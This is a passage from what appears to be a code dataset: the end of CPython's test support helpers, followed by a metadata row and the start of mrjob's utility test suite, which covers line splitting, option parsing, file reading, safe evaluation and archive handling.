will be checked for partial (i.e. substring) matches. You can extend
this scheme to (for example) do regular expression matching, etc.
"""
result = True
for k in kwargs:
v = kwargs[k]
dv = d.get(k)
if not self.match_value(k, dv, v):
result = False
break
return result
def match_value(self, k, dv, v):
"""
Try to match a single stored value (dv) with a supplied value (v).
"""
if type(v) != type(dv):
result = False
elif type(dv) is not str or k not in self._partial_matches:
result = (v == dv)
else:
result = dv.find(v) >= 0
return result
_can_symlink = None
def can_symlink():
global _can_symlink
if _can_symlink is not None:
return _can_symlink
symlink_path = TESTFN + "can_symlink"
try:
os.symlink(TESTFN, symlink_path)
can = True
except (OSError, NotImplementedError, AttributeError):
can = False
else:
os.remove(symlink_path)
_can_symlink = can
return can
def skip_unless_symlink(test):
"""Skip decorator for tests that require functional symlink"""
ok = can_symlink()
msg = "Requires functional symlink implementation"
return test if ok else unittest.skip(msg)(test)
_can_xattr = None
def can_xattr():
global _can_xattr
if _can_xattr is not None:
return _can_xattr
if not hasattr(os, "setxattr"):
can = False
else:
tmp_dir = tempfile.mkdtemp()
tmp_fp, tmp_name = tempfile.mkstemp(dir=tmp_dir)
try:
with open(TESTFN, "wb") as fp:
try:
# TESTFN & tempfile may use different file systems with
# different capabilities
os.setxattr(tmp_fp, b"user.test", b"")
os.setxattr(tmp_name, b"trusted.foo", b"42")
os.setxattr(fp.fileno(), b"user.test", b"")
# Kernels < 2.6.39 don't respect setxattr flags.
kernel_version = platform.release()
m = re.match(r"2.6.(\d{1,2})", kernel_version)
can = m is None or int(m.group(1)) >= 39
except OSError:
can = False
finally:
unlink(TESTFN)
unlink(tmp_name)
rmdir(tmp_dir)
_can_xattr = can
return can
def skip_unless_xattr(test):
"""Skip decorator for tests that require functional extended attributes"""
ok = can_xattr()
msg = "no non-broken extended attribute support"
return test if ok else unittest.skip(msg)(test)
_bind_nix_socket_error = None
def skip_unless_bind_unix_socket(test):
"""Decorator for tests requiring a functional bind() for unix sockets."""
if not hasattr(socket, 'AF_UNIX'):
return unittest.skip('No UNIX Sockets')(test)
global _bind_nix_socket_error
if _bind_nix_socket_error is None:
path = TESTFN + "can_bind_unix_socket"
with socket.socket(socket.AF_UNIX) as sock:
try:
sock.bind(path)
_bind_nix_socket_error = False
except OSError as e:
_bind_nix_socket_error = e
finally:
unlink(path)
if _bind_nix_socket_error:
msg = 'Requires a functional unix bind(): %s' % _bind_nix_socket_error
return unittest.skip(msg)(test)
else:
return test
def fs_is_case_insensitive(directory):
"""Detects if the file system for the specified directory is case-insensitive."""
with tempfile.NamedTemporaryFile(dir=directory) as base:
base_path = base.name
case_path = base_path.upper()
if case_path == base_path:
case_path = base_path.lower()
try:
return os.path.samefile(base_path, case_path)
except FileNotFoundError:
return False
def detect_api_mismatch(ref_api, other_api, *, ignore=()):
"""Returns the set of items in ref_api not in other_api, except for a
defined list of items to be ignored in this check.
By default this skips private attributes beginning with '_' but
includes all magic methods, i.e. those starting and ending in '__'.
"""
missing_items = set(dir(ref_api)) - set(dir(other_api))
if ignore:
missing_items -= set(ignore)
missing_items = set(m for m in missing_items
if not m.startswith('_') or m.endswith('__'))
return missing_items
def check__all__(test_case, module, name_of_module=None, extra=(),
blacklist=()):
"""Assert that the __all__ variable of 'module' contains all public names.
The module's public names (its API) are detected automatically based on
whether they match the public name convention and were defined in
'module'.
The 'name_of_module' argument can specify (as a string or tuple thereof)
    what module(s) an API could be defined in, in order to be detected as a
public API. One case for this is when 'module' imports part of its public
API from other modules, possibly a C backend (like 'csv' and its '_csv').
The 'extra' argument can be a set of names that wouldn't otherwise be
automatically detected as "public", like objects without a proper
'__module__' attribute. If provided, it will be added to the
automatically detected ones.
The 'blacklist' argument can be a set of names that must not be treated
as part of the public API even though their names indicate otherwise.
Usage:
import bar
import foo
import unittest
from test import support
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, foo)
class OtherTestCase(unittest.TestCase):
def test__all__(self):
extra = {'BAR_CONST', 'FOO_CONST'}
blacklist = {'baz'} # Undocumented name.
# bar imports part of its API from _bar.
support.check__all__(self, bar, ('bar', '_bar'),
extra=extra, blacklist=blacklist)
"""
if name_of_module is None:
name_of_module = (module.__name__, )
elif isinstance(name_of_module, str):
name_of_module = (name_of_module, )
expected = set(extra)
for name in dir(module):
if name.startswith('_') or name in blacklist:
continue
obj = getattr(module, name)
if (getattr(obj, '__module__', None) in name_of_module or
(not hasattr(obj, '__module__') and
not isinstance(obj, types.ModuleType))):
expected.add(name)
test_case.assertCountEqual(module.__all__, expected)
class SuppressCrashReport:
"""Try to prevent a crash report from popping up.
On Windows, don't display the Windows Error Reporting dialog. On UNIX,
disable the creation of coredump file.
"""
old_value = None
old_modes = None
def __enter__(self):
"""On Windows, disable Windows Error Reporting dialogs using
SetErrorMode.
On UNIX, try to save the previous core file size limit, then set
soft limit to 0.
"""
if sys.platform.startswith('win'):
# see http://msdn.microsoft.com/en-us/library/windows/desktop/ms680621.aspx
# GetErrorMode is not available on Windows XP and Windows Server 2003,
# but SetErrorMode returns the previous value, so we can use that
import ctypes
self._k32 = ctypes.windll.kernel32
SEM_NOGPFAULTERRORBOX = 0x02
self.old_value = self._k32.SetErrorMode(SEM_NOGPFAULTERRORBOX)
self._k32.SetErrorMode(self.old_value | SEM_NOGPFAULTERRORBOX)
# Suppress assert dialogs in debug builds
# (see http://bugs.python.org/issue23314)
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
# no msvcrt or a release build
pass
else:
self.old_modes = {}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
old_mode = msvcrt.CrtSetReportMode(report_type,
msvcrt.CRTDBG_MODE_FILE)
old_file = msvcrt.CrtSetReportFile(report_type,
msvcrt.CRTDBG_FILE_STDERR)
self.old_modes[report_type] = old_mode, old_file
else:
if resource is not None:
try:
self.old_value = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE,
(0, self.old_value[1]))
except (ValueError, OSError):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
cmd = ['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType']
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with proc:
stdout = proc.communicate()[0]
if stdout.strip() == b'developer':
print("this test triggers the Crash Reporter, "
"that is intentional", end='', flush=True)
return self
def __exit__(self, *ignore_exc):
"""Restore Windows ErrorMode or core file behavior to initial value."""
if self.old_value is None:
return
if sys.platform.startswith('win'):
self._k32.SetErrorMode(self.old_value)
if self.old_modes:
import msvcrt
for report_type, (old_mode, old_file) in self.old_modes.items():
msvcrt.CrtSetReportMode(report_type, old_mode)
msvcrt.CrtSetReportFile(report_type, old_file)
else:
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_value)
except (ValueError, OSError):
pass
def patch(test_instance, object_to_patch, attr_name, new_value):
"""Override 'object_to_patch'.'attr_name' with 'new_value'.
Also, add a cleanup procedure to 'test_instance' to restore
'object_to_patch' value for 'attr_name'.
The 'attr_name' should be a valid attribute for 'object_to_patch'.
"""
# check that 'attr_name' is a real attribute for 'object_to_patch'
# will raise AttributeError if it does not exist
getattr(object_to_patch, attr_name)
# keep a copy of the old value
attr_is_local = False
try:
old_value = object_to_patch.__dict__[attr_name]
except (AttributeError, KeyError):
old_value = getattr(object_to_patch, attr_name, None)
else:
attr_is_local = True
# restore the value when the test is done
def cleanup():
if attr_is_local:
setattr(object_to_patch, attr_name, old_value)
else:
delattr(object_to_patch, attr_name)
test_instance.addCleanup(cleanup)
# actually override the attribute
setattr(object_to_patch, attr_name, new_value)
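# Illustrative sketch (editor-added): patch() overrides an attribute for one test and
# registers addCleanup() to restore it, so no tearDown() code is needed.
class _ExamplePatchTest(unittest.TestCase):
    def test_patched_sep(self):
        patch(self, os, 'sep', '!')
        self.assertEqual(os.sep, '!')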
def run_in_subinterp(code):
"""
Run code in a subinterpreter. Raise unittest.SkipTest if the tracemalloc
module is enabled.
"""
# Issue #10915, #15751: PyGILState_*() functions don't work with
# sub-interpreters, the tracemalloc module uses these functions internally
try:
import tracemalloc
except ImportError:
pass
else:
if tracemalloc.is_tracing():
raise unittest.SkipTest("run_in_subinterp() cannot be used "
"if tracemalloc module is tracing "
"memory allocations")
import _testcapi
return _testcapi.run_in_subinterp(code)
def check_free_after_iterating(test, iter, cls, args=()):
class A(cls):
def __del__(self):
nonlocal done
done = True
try:
next(it)
except StopIteration:
pass
done = False
it = iter(A(*args))
# Issue 26494: Shouldn't crash
test.assertRaises(StopIteration, next, it)
# The sequence should be deallocated just after the end of iterating
gc_collect()
test.assertTrue(done)
def missing_compiler_executable(cmd_names=[]):
"""Check if the compiler components used to build the interpreter exist.
Check for the existence of the compiler executables whose names are listed
in 'cmd_names' or all the compiler executables when 'cmd_names' is empty
and return the first missing executable or None when none is found
missing.
"""
from distutils import ccompiler, sysconfig, spawn
compiler = ccompiler.new_compiler()
sysconfig.customize_compiler(compiler)
for name in compiler.executables:
if cmd_names and name not in cmd_names:
continue
cmd = getattr(compiler, name)
if cmd_names:
assert cmd is not None, \
"the '%s' executable is not configured" % name
elif cmd is None:
continue
if spawn.find_executable(cmd[0]) is None:
return cmd[0]
_is_android_emulator = None
def setswitchinterval(interval):
# Setting a very low gil interval on the Android emulator causes python
# to hang (issue #26939).
minimum_interval = 1e-5
if is_android and interval < minimum_interval:
global _is_android_emulator
if _is_android_emulator is None:
_is_android_emulator = (subprocess.check_output(
['getprop', 'ro.kernel.qemu']).strip() == b'1')
if _is_android_emulator:
interval = minimum_interval
return sys.setswitchinterval(interval)
@contextlib.contextmanager
def disable_faulthandler():
# use sys.__stderr__ instead of sys.stderr, since regrtest replaces
# sys.stderr with a StringIO which has no file descriptor when a test
# is run with -W/--verbose3.
fd = sys.__stderr__.fileno()
is_enabled = faulthandler.is_enabled()
try:
faulthandler.disable()
yield
finally:
if is_enabled:
faulthandler.enable(file=fd, all_threads=True)
def fd_count():
"""Count the number of open file descriptors.
"""
if sys.platform.startswith(('linux', 'freebsd')):
try:
names = os.listdir("/proc/self/fd")
            # Subtract one because listdir() internally opens a file
# descriptor to list the content of the /proc/self/fd/ directory.
return len(names) - 1
except FileNotFoundError:
pass
MAXFD = 256
if hasattr(os, 'sysconf'):
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except OSError:
pass
old_modes = None
if sys.platform == 'win32':
# bpo-25306, bpo-31009: Call CrtSetReportMode() to not kill the process
# on invalid file descriptor if Python is compiled in debug mode
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
# no msvcrt or a release build
pass
else:
old_modes = {}
for report_type in (msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT):
old_modes[report_type] = msvcrt.CrtSetReportMode(report_type, 0)
try:
count = 0
for fd in range(MAXFD):
try:
# Prefer dup() over fstat(). fstat() can require input/output
# whereas dup() doesn't.
fd2 = os.dup(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
else:
os.close(fd2)
count += 1
finally:
if old_modes is not None:
for report_type in (msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT):
msvcrt.CrtSetReportMode(report_type, old_modes[report_type])
return count
class SaveSignals:
"""
Save and restore signal handlers.
This class is only able to save/restore signal handlers registered
by the Python signal module: see bpo-13285 for "external" signal
handlers.
"""
def __init__(self):
import signal
self.signal = signal
self.signals = signal.valid_signals()
# SIGKILL and SIGSTOP signals cannot be ignored nor caught
for signame in ('SIGKILL', 'SIGSTOP'):
try:
signum = getattr(signal, signame)
except AttributeError:
continue
self.signals.remove(signum)
self.handlers = {}
def save(self):
for signum in self.signals:
handler = self.signal.getsignal(signum)
if handler is None:
# getsignal() returns None if a signal handler was not
# registered by the Python signal module,
# and the handler is not SIG_DFL nor SIG_IGN.
#
# Ignore the signal: we cannot restore the handler.
continue
self.handlers[signum] = handler
def restore(self):
for signum, handler in self.handlers.items():
self.signal.signal(signum, handler)
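# Illustrative sketch (editor-added): snapshot all Python-level signal handlers,
# install a temporary one, then restore the originals.
def _example_save_signals_usage():
    import signal
    saver = SaveSignals()
    saver.save()
    try:
        signal.signal(signal.SIGTERM, lambda signum, frame: None)
    finally:
        saver.restore()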
def with_pymalloc():
import _testcapi
return _testcapi.WITH_PYMALLOC
class FakePath:
"""Simple implementing of the path protocol.
"""
def __init__(self, path):
self.path = path
def __repr__(self):
return f'<FakePath {self.path!r}>'
def __fspath__(self):
if (isinstance(self.path, BaseException) or
isinstance(self.path, type) and
issubclass(self.path, BaseException)):
raise self.path
else:
return self.path
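# Illustrative sketch (editor-added): os.fspath() goes through __fspath__, so FakePath
# can stand in for a path-like object; passing an exception class (or instance) makes
# the conversion raise, which is handy for error-path tests.
def _example_fakepath_usage():
    assert os.fspath(FakePath('/tmp/example')) == '/tmp/example'
    try:
        os.fspath(FakePath(ZeroDivisionError))
    except ZeroDivisionError:
        pass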
def maybe_get_event_loop_policy():
"""Return the global event loop policy if one is set, else return None."""
return asyncio.events._event_loop_policy
| [] | [] | ["TZ"] | [] | ["TZ"] | python | 1 | 0 | |
tests/test_util.py
|
# Copyright 2009-2015 Yelp and Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests of all the amazing utilities in mrjob.util"""
import bz2
import gzip
import optparse
import os
import shutil
import sys
import tarfile
import tempfile
from io import BytesIO
from subprocess import PIPE
from subprocess import Popen
from mrjob.py2 import PY2
from mrjob.py2 import StringIO
from mrjob.util import buffer_iterator_to_line_iterator
from mrjob.util import cmd_line
from mrjob.util import file_ext
from mrjob.util import log_to_stream
from mrjob.util import parse_and_save_options
from mrjob.util import random_identifier
from mrjob.util import read_file
from mrjob.util import read_input
from mrjob.util import safeeval
from mrjob.util import scrape_options_into_new_groups
from mrjob.util import tar_and_gzip
from mrjob.util import to_lines
from mrjob.util import unarchive
from mrjob.util import unique
from mrjob.util import which
from tests.py2 import TestCase
from tests.py2 import patch
from tests.quiet import no_handlers_for_logger
from tests.sandbox import SandboxedTestCase
from tests.sandbox import random_seed
class ToLinesTestCase(TestCase):
def test_empty(self):
self.assertEqual(
list(to_lines(_ for _ in ())),
[])
def test_buffered_lines(self):
self.assertEqual(
list(to_lines(chunk for chunk in
[b'The quick\nbrown fox\nju',
b'mped over\nthe lazy\ndog',
b's.\n'])),
[b'The quick\n', b'brown fox\n', b'jumped over\n', b'the lazy\n',
b'dogs.\n'])
def test_empty_chunks(self):
self.assertEqual(
list(to_lines(chunk for chunk in
[b'',
b'The quick\nbrown fox\nju',
b'', b'', b'',
b'mped over\nthe lazy\ndog',
b'',
b's.\n',
b''])),
[b'The quick\n', b'brown fox\n', b'jumped over\n', b'the lazy\n',
b'dogs.\n'])
def test_no_trailing_newline(self):
self.assertEqual(
list(to_lines(chunk for chunk in
[b'Alouette,\ngentille',
b' Alouette.'])),
[b'Alouette,\n', b'gentille Alouette.'])
def test_long_lines(self):
super_long_line = b'a' * 10000 + b'\n' + b'b' * 1000 + b'\nlast\n'
self.assertEqual(
list(to_lines(
chunk for chunk in
(super_long_line[0+i:1024+i]
for i in range(0, len(super_long_line), 1024)))),
[b'a' * 10000 + b'\n', b'b' * 1000 + b'\n', b'last\n'])
def test_deprecated_alias(self):
with no_handlers_for_logger('mrjob.util'):
stderr = StringIO()
log_to_stream('mrjob.util', stderr)
self.assertEqual(
list(buffer_iterator_to_line_iterator(chunk for chunk in
[b'The quick\nbrown fox\nju',
b'mped over\nthe lazy\ndog',
b's.\n'])),
[b'The quick\n', b'brown fox\n', b'jumped over\n', b'the lazy\n',
b'dogs.\n'])
self.assertIn('has been renamed', stderr.getvalue())
class CmdLineTestCase(TestCase):
def test_cmd_line(self):
self.assertEqual(cmd_line(['cut', '-f', 2, '-d', ' ']),
"cut -f 2 -d ' '")
self.assertIn(cmd_line(['grep', '-e', "# DON'T USE$"]),
("grep -e \"# DON'T USE\\$\"",
'grep -e \'# DON\'"\'"\'T USE$\''))
# expand_path() is tested by tests.test_conf.CombineAndExpandPathsTestCase
class FileExtTestCase(TestCase):
def test_file_ext(self):
self.assertEqual(file_ext('foo.zip'), '.zip')
self.assertEqual(file_ext('foo.Z'), '.Z')
self.assertEqual(file_ext('foo.tar.gz'), '.tar.gz')
self.assertEqual(file_ext('README'), '')
self.assertEqual(file_ext('README,v'), '')
self.assertEqual(file_ext('README.txt,v'), '.txt,v')
class OptionScrapingTestCase(TestCase):
def setUp(self):
self.setup_options()
def setup_options(self):
self.original_parser = optparse.OptionParser(
usage="don't", description='go away')
self.original_group = optparse.OptionGroup(self.original_parser, '?')
self.original_parser.add_option_group(self.original_group)
self.original_parser.add_option(
'-b', '--no-a', dest='a', action='store_false')
self.original_parser.add_option(
'-a', '--yes-a', dest='a', action='store_true', default=False)
self.original_group.add_option('-x', '--xx', dest='x', action='store')
self.original_group.add_option('-y', '--yy', dest='y', action='store')
self.new_parser = optparse.OptionParser()
self.new_group_1 = optparse.OptionGroup(self.new_parser, '?')
self.new_group_2 = optparse.OptionGroup(self.new_parser, '?')
self.new_parser.add_option_group(self.new_group_1)
self.new_parser.add_option_group(self.new_group_2)
def test_scrape_all(self):
assignments = {
self.new_parser: ('a',),
self.new_group_1: ('x', 'y'),
}
old_groups = (self.original_parser, self.original_group)
scrape_options_into_new_groups(old_groups, assignments)
self.assertEqual(self.original_parser.option_list[1:],
self.new_parser.option_list[1:])
self.assertEqual(self.original_group.option_list,
self.new_group_1.option_list)
def test_scrape_different(self):
assignments = {
self.new_parser: ('x',),
self.new_group_1: ('y',),
self.new_group_2: ('a',),
}
old_groups = (self.original_parser, self.original_group)
scrape_options_into_new_groups(old_groups, assignments)
target_1 = self.original_group.option_list[:1]
target_2 = self.original_group.option_list[1:]
target_3 = self.original_parser.option_list[1:]
self.assertEqual(target_1, self.new_parser.option_list[1:])
self.assertEqual(target_2, self.new_group_1.option_list)
self.assertEqual(target_3, self.new_group_2.option_list)
options, args = self.new_parser.parse_args(['-x', 'happy'])
self.assertEqual(options.x, 'happy')
def test_parse_and_save_simple(self):
args = ['x.py', '-b', '-a', '--no-a', '-x', 'x', '-y', 'y', '-x', 'z']
self.assertEqual(
dict(parse_and_save_options(self.original_parser, args)),
{
'a': ['-b', '-a', '--no-a'],
'x': ['-x', 'x', '-x', 'z'],
'y': ['-y', 'y']
})
def test_parse_and_save_with_dashes(self):
args = ['x.py', '-b', '-a', '--no-a', '-x', 'x', '-y', 'y', '-x', 'z',
'--', 'ignore', 'these', 'args']
self.assertEqual(
dict(parse_and_save_options(self.original_parser, args)),
{
'a': ['-b', '-a', '--no-a'],
'x': ['-x', 'x', '-x', 'z'],
'y': ['-y', 'y']
})
class ReadInputTestCase(TestCase):
@classmethod
def setUpClass(cls):
cls.setup_tmpdir_with_beaver_data()
@classmethod
def tearDownClass(cls):
cls.delete_tmpdir()
# we're going to put the same data in every file, so we don't
# have to worry about ordering
BEAVER_DATA = b'Beavers mate for life.\n'
@classmethod
def setup_tmpdir_with_beaver_data(cls):
cls.tmpdir = tempfile.mkdtemp()
def write_beaver_data_and_close(f):
f.write(cls.BEAVER_DATA)
f.close()
write_beaver_data_and_close(
open(os.path.join(cls.tmpdir, 'beavers.txt'), 'wb'))
write_beaver_data_and_close(
gzip.GzipFile(os.path.join(cls.tmpdir, 'beavers.gz'), 'wb'))
write_beaver_data_and_close(
bz2.BZ2File(os.path.join(cls.tmpdir, 'beavers.bz2'), 'wb'))
os.mkdir(os.path.join(cls.tmpdir, 'beavers'))
write_beaver_data_and_close(
open(os.path.join(cls.tmpdir, 'beavers/README.txt'), 'wb'))
@classmethod
def delete_tmpdir(cls):
shutil.rmtree(cls.tmpdir)
def test_stdin(self):
lines = read_input('-', stdin=BytesIO(self.BEAVER_DATA))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_stdin_can_be_iterator(self):
lines = read_input('-', stdin=[self.BEAVER_DATA] * 5)
self.assertEqual(list(lines), [self.BEAVER_DATA] * 5)
def test_normal_file(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers'))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_gz_file(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers.gz'))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_bz2_file(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers.bz2'))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_glob(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers.*'))
self.assertEqual(list(lines), [self.BEAVER_DATA] * 3)
def test_dir(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers/'))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_dir_recursion(self):
lines = read_input(self.tmpdir)
self.assertEqual(list(lines), [self.BEAVER_DATA] * 4)
def test_glob_including_dir(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers*'))
self.assertEqual(list(lines), [self.BEAVER_DATA] * 4)
def test_bad_path(self):
# read_input is a generator, so we won't get an error
# until we try to read from it
self.assertRaises(IOError, list,
read_input(os.path.join(self.tmpdir, 'lions')))
def test_bad_glob(self):
# read_input is a generator, so we won't get an error
# until we try to read from it
self.assertRaises(IOError, list,
read_input(os.path.join(self.tmpdir, 'lions*')))
class SafeEvalTestCase(TestCase):
def test_simple_data_structures(self):
# try unrepr-ing a bunch of simple data structures
for x in True, None, 1, [0, 1, 2, 3, 4], {'foo': False, 'bar': 2}:
self.assertEqual(x, safeeval(repr(x)))
def test_no_mischief(self):
# make sure we can't do mischief
self.assertRaises(NameError, safeeval, "open('/tmp')")
def test_globals_and_locals(self):
# test passing in globals, locals
a = -0.2
self.assertEqual(
abs(a),
safeeval('abs(a)', globals={'abs': abs}, locals={'a': a}))
def test_range_type(self):
# ranges have different reprs on Python 2 vs. Python 3, and
# can't be checked for equality until Python 3.3+
if PY2:
range_type = xrange
else:
range_type = range
self.assertEqual(repr(safeeval(repr(range_type(3)))),
repr(range_type(3)))
if sys.version_info >= (3, 3):
self.assertEqual(safeeval(repr(range_type(3))),
range_type(3))
class ArchiveTestCase(TestCase):
def setUp(self):
self.setup_tmp_dir()
def tearDown(self):
self.rm_tmp_dir()
def setup_tmp_dir(self):
join = os.path.join
self.tmp_dir = tempfile.mkdtemp()
os.mkdir(join(self.tmp_dir, 'a')) # contains files to archive
# create a/foo
with open(join(self.tmp_dir, 'a', 'foo'), 'w') as foo:
foo.write('FOO\n')
# a/bar symlinks to a/foo
os.symlink('foo', join(self.tmp_dir, 'a', 'bar'))
# create a/baz; going to filter this out
with open(join(self.tmp_dir, 'a', 'baz'), 'w') as baz:
baz.write('BAZ\n')
# create a/qux/quux
os.mkdir(join(self.tmp_dir, 'a', 'qux'))
with open(join(self.tmp_dir, 'a', 'qux', 'quux'), 'w') as quux:
quux.write('QUUX\n')
def rm_tmp_dir(self):
shutil.rmtree(self.tmp_dir)
def ensure_expected_results(self, added_files=[], excluded_files=[]):
join = os.path.join
# make sure the files we expect are there
expected_files = ['bar', 'baz', 'foo', 'qux']
expected_files = (set(expected_files + added_files) -
set(excluded_files))
self.assertEqual(
sorted(os.listdir(join(self.tmp_dir, 'b'))),
sorted(expected_files))
self.assertEqual(
list(os.listdir(join(self.tmp_dir, 'b', 'qux'))), ['quux'])
# make sure their contents are intact
with open(join(self.tmp_dir, 'b', 'foo')) as foo:
self.assertEqual(foo.read(), 'FOO\n')
with open(join(self.tmp_dir, 'b', 'bar')) as bar:
self.assertEqual(bar.read(), 'FOO\n')
with open(join(self.tmp_dir, 'b', 'qux', 'quux')) as quux:
self.assertEqual(quux.read(), 'QUUX\n')
# make sure symlinks are converted to files
assert os.path.isfile(join(self.tmp_dir, 'b', 'bar'))
assert not os.path.islink(join(self.tmp_dir, 'b', 'bar'))
def test_tar_and_gzip(self):
join = os.path.join
# tar it up, and put it in subdirectory (b/)
tar_and_gzip(dir=join(self.tmp_dir, 'a'),
out_path=join(self.tmp_dir, 'a.tar.gz'),
filter=lambda path: not path.endswith('z'),
prefix='b')
# untar it into b/
t = tarfile.open(join(self.tmp_dir, 'a.tar.gz'), 'r:gz')
t.extractall(self.tmp_dir)
t.close()
self.ensure_expected_results(excluded_files=['baz'])
def archive_and_unarchive(self, extension, archive_template,
added_files=[]):
join = os.path.join
# archive it up
archive_name = 'a.' + extension
variables = dict(archive_name=join('..', archive_name),
files_to_archive='.')
archive_command = [arg % variables for arg in archive_template]
# sometimes the relevant command isn't available or doesn't work;
# if so, skip the test
try:
proc = Popen(archive_command, cwd=join(self.tmp_dir, 'a'),
stdout=PIPE, stderr=PIPE)
except OSError as e:
if e.errno == 2:
self.skipTest("No %s command" % archive_command[0])
else:
raise
proc.communicate() # discard output
if proc.returncode != 0:
self.skipTest("Can't run `%s` to create archive." %
cmd_line(archive_command))
# unarchive it into b/
unarchive(join(self.tmp_dir, archive_name), join(self.tmp_dir, 'b'))
self.ensure_expected_results(added_files=added_files)
def test_unarchive_tar(self):
# this test requires that tar is present
self.archive_and_unarchive(
'tar',
['tar', 'chf', '%(archive_name)s', '%(files_to_archive)s'])
def test_unarchive_tar_gz(self):
# this test requires that tar is present and supports the "z" option
self.archive_and_unarchive(
'tar.gz',
['tar', 'czhf', '%(archive_name)s', '%(files_to_archive)s'])
def test_unarchive_tar_bz2(self):
# this test requires that tar is present and supports the "j" option
self.archive_and_unarchive(
'tar.bz2',
['tar', 'cjhf', '%(archive_name)s', '%(files_to_archive)s'])
def test_unarchive_jar(self):
# this test requires that jar is present
self.archive_and_unarchive(
'jar',
['jar', 'cf', '%(archive_name)s', '%(files_to_archive)s'],
added_files=['META-INF'])
def test_unarchive_zip(self):
# this test requires that zip is present
self.archive_and_unarchive('zip', ['zip', '-qr',
'%(archive_name)s', '%(files_to_archive)s'])
def test_unarchive_non_archive(self):
join = os.path.join
self.assertRaises(
IOError,
unarchive, join(self.tmp_dir, 'a', 'foo'), join(self.tmp_dir, 'b'))
class OnlyReadWrapper(object):
"""Restrict a file object to only the read() method (used by
ReadFileTestCase)."""
def __init__(self, fp):
self.fp = fp
def read(self, *args, **kwargs):
return self.fp.read(*args, **kwargs)
class ReadFileTestCase(TestCase):
def setUp(self):
self.make_tmp_dir()
def tearDown(self):
self.rm_tmp_dir()
def make_tmp_dir(self):
self.tmp_dir = tempfile.mkdtemp()
def rm_tmp_dir(self):
shutil.rmtree(self.tmp_dir)
def test_read_uncompressed_file(self):
input_path = os.path.join(self.tmp_dir, 'input')
with open(input_path, 'wb') as input_file:
input_file.write(b'bar\nfoo\n')
output = []
for line in read_file(input_path):
output.append(line)
self.assertEqual(output, [b'bar\n', b'foo\n'])
def test_read_uncompressed_file_from_fileobj(self):
input_path = os.path.join(self.tmp_dir, 'input')
with open(input_path, 'wb') as input_file:
input_file.write(b'bar\nfoo\n')
output = []
with open(input_path, 'rb') as f:
for line in read_file(input_path, fileobj=f):
output.append(line)
self.assertEqual(output, [b'bar\n', b'foo\n'])
def test_read_gz_file(self):
input_gz_path = os.path.join(self.tmp_dir, 'input.gz')
input_gz = gzip.GzipFile(input_gz_path, 'wb')
input_gz.write(b'foo\nbar\n')
input_gz.close()
output = []
for line in read_file(input_gz_path):
output.append(line)
self.assertEqual(output, [b'foo\n', b'bar\n'])
def test_read_bz2_file(self):
input_bz2_path = os.path.join(self.tmp_dir, 'input.bz2')
input_bz2 = bz2.BZ2File(input_bz2_path, 'wb')
input_bz2.write(b'bar\nbar\nfoo\n')
input_bz2.close()
output = []
for line in read_file(input_bz2_path):
output.append(line)
self.assertEqual(output, [b'bar\n', b'bar\n', b'foo\n'])
def test_read_large_bz2_file(self):
# catch incorrect use of bz2 library (Issue #814)
input_bz2_path = os.path.join(self.tmp_dir, 'input.bz2')
input_bz2 = bz2.BZ2File(input_bz2_path, 'wb')
# can't just repeat same value, because we need the file to be
# compressed! 50000 lines is too few to catch the bug.
with random_seed(0):
for _ in range(100000):
input_bz2.write((random_identifier() + '\n').encode('ascii'))
input_bz2.close()
# now expect to read back the same bytes
with random_seed(0):
num_lines = 0
for line in read_file(input_bz2_path):
self.assertEqual(line,
(random_identifier() + '\n').encode('ascii'))
num_lines += 1
self.assertEqual(num_lines, 100000)
def test_read_gz_file_from_fileobj(self):
input_gz_path = os.path.join(self.tmp_dir, 'input.gz')
input_gz = gzip.GzipFile(input_gz_path, 'wb')
input_gz.write(b'foo\nbar\n')
input_gz.close()
output = []
with open(input_gz_path, 'rb') as f:
for line in read_file(input_gz_path, fileobj=OnlyReadWrapper(f)):
output.append(line)
self.assertEqual(output, [b'foo\n', b'bar\n'])
def test_read_bz2_file_from_fileobj(self):
input_bz2_path = os.path.join(self.tmp_dir, 'input.bz2')
input_bz2 = bz2.BZ2File(input_bz2_path, 'wb')
input_bz2.write(b'bar\nbar\nfoo\n')
input_bz2.close()
output = []
with open(input_bz2_path, 'rb') as f:
for line in read_file(input_bz2_path, fileobj=OnlyReadWrapper(f)):
output.append(line)
self.assertEqual(output, [b'bar\n', b'bar\n', b'foo\n'])
class RandomIdentifierTestCase(TestCase):
def test_format(self):
with random_seed(0):
random_id = random_identifier()
self.assertEqual(len(random_id), 16)
self.assertFalse(set(random_id) - set('0123456789abcdef'))
def test_no_collisions_possible_ever(self):
